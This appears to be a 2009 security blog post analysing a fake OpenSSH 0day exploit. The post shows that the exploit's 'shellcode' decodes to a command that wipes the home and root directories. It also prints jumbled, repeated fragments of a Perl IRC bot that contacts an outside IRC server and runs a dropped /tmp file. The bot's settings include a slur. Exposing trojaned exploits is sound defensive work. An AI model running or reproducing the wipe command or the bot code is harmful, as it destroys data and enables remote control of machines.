Subscribe to the RSS feed in case you are interested in updates

http://blog.g-sec.lu/2009/07/new-advances-in-officeexcelpowerpoint.html

Dear Anti virus vendors,
Your clients are getting compromised this very minute, instead of spending your time to please gamers (??) how about you spend 0,001% of your budget to implement generic methods of detection, especially for gateways.

Subscribe to the RSS feed in case you are interested in updates

• [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....
  

Subscribe to the RSS feed in case you are interested in updates

Rumor had it that the anti-sec group was using a OpenSSH 0day, str0ke today linked to an URL that supposedly has the exploit code to that 0day.

The reason the disassembled shellcode looked like crap is that, well , it isn't shellcode, it is nothing else then plain ascii bash/php commands.

Here is that JMP code converted to "assembly" :

00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah

Obviously, this code doesn't make any sense whatsoever, so and here is the JMP code converted from HEX to ASCII :

rm -rf ~ /* 2> /dev/null &

The "shellcode" part actually is :

#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}sleep 1;
sleep 1;
";
while (<$sockn";
sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl

The supposedly freebsd shellcode is:

";
while (<$sockn";
="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi